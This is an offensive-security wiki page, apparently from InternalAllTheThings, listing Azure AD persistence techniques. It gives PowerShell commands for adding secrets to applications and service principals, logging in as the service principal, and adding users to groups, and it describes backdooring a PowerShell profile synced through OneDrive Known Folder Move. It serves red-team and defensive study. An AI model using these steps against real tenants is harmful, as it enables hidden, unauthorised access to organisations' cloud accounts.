azure-persistence.md (3204B)
1 --- 2 title: "Azure AD - Persistence" 3 section: "Cloud" 4 sectionSlug: "cloud" 5 sourcePath: "docs/cloud/azure/azure-persistence.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/cloud/azure/azure-persistence.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Azure AD - Persistence 12 13 ## Add Secrets to Application 14 15 * Add secrets with [lutzenfried/OffensiveCloud/Add-AzADAppSecret.ps1](https://github.com/lutzenfried/OffensiveCloud/blob/main/Azure/Tools/Add-AzADAppSecret.ps1) 16 17 ```powershell 18 PS > . C:\Tools\Add-AzADAppSecret.ps1 19 PS > Add-AzADAppSecret -GraphToken $graphtoken -Verbose 20 ``` 21 22 * Use secrets to authenticate as Service Principal 23 24 ```ps1 25 PS > $password = ConvertTo-SecureString '<SECRET/PASSWORD>' -AsPlainText -Force 26 PS > $creds = New-Object System.Management.Automation.PSCredential('<AppID>', $password) 27 PS > Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant '<TenantID>' 28 ``` 29 30 ## Add Service Principal 31 32 * Generate a new service principal password/secret 33 34 ```ps1 35 Import-Module Microsoft.Graph.Applications 36 Connect-MgGraph 37 $servicePrincipalId = "<service-principal-id>" 38 39 $params = @{ 40 passwordCredential = @{ 41 displayName = "NewCreds" 42 } 43 } 44 Add-MgServicePrincipalPassword -ServicePrincipalId $servicePrincipalId -BodyParameter $params 45 ``` 46 47 ## Add User to Group 48 49 ```ps1 50 Add-AzureADGroupMember -ObjectId <group_id> -RefObjectId <user_id> -Verbose 51 ``` 52 53 ## PowerShell Profile Backdoor Using KFM 54 55 OneDrive for Business Known Folder Move (KFM) is a feature in Microsoft OneDrive for Business that enables users and organizations to automatically redirect the contents of key Windows user folders; Desktop, Documents, and Pictures from their local PC to OneDrive. 56 57 A PowerShell profile is a script file that loads whenever you start a new PowerShell session (such as opening PowerShell or Windows Terminal). Users and administrators often customize their profiles to set aliases, environment variables, functions, or pre-load modules. 58 59 **Requirements**: 60 61 * `Files.ReadWrite.All` privilege 62 63 **Methodology**: 64 65 Known Folder Move moves the user's Documents (and/or Desktop, Pictures) folder to OneDrive for Business, typically syncing: 66 67 ```ps1 68 C:\Users\<username>\Documents → C:\Users\<username>\OneDrive - <TenantName>\Documents 69 ``` 70 71 This means the PowerShell profile file (`Documents\PowerShell\Microsoft.PowerShell_profile.ps1`) will now be synced to OneDrive. 72 73 Push a malicious PowerShell profile at `$HOME\Documents\PowerShell\Microsoft.PowerShell_profile.ps1`. 74 75 ## References 76 77 * [High-Profile Cloud Privesc - Leonidas Tsaousis - July 15, 2025](https://labs.reversec.com/posts/2025/07/high-profile-cloud-privesc) 78 * [Maintaining Azure Persistence via automation accounts - Karl Fosaaen - September 12, 2019](https://blog.netspi.com/maintaining-azure-persistence-via-automation-accounts/) 79 * [Microsoft Graph - servicePrincipal: addPassword](https://learn.microsoft.com/en-us/graph/api/serviceprincipal-addpassword?view=graph-rest-1.0&tabs=powershell) 80 * [Training - Attacking and Defending Azure Lab - Altered Security](https://www.alteredsecurity.com/azureadlab)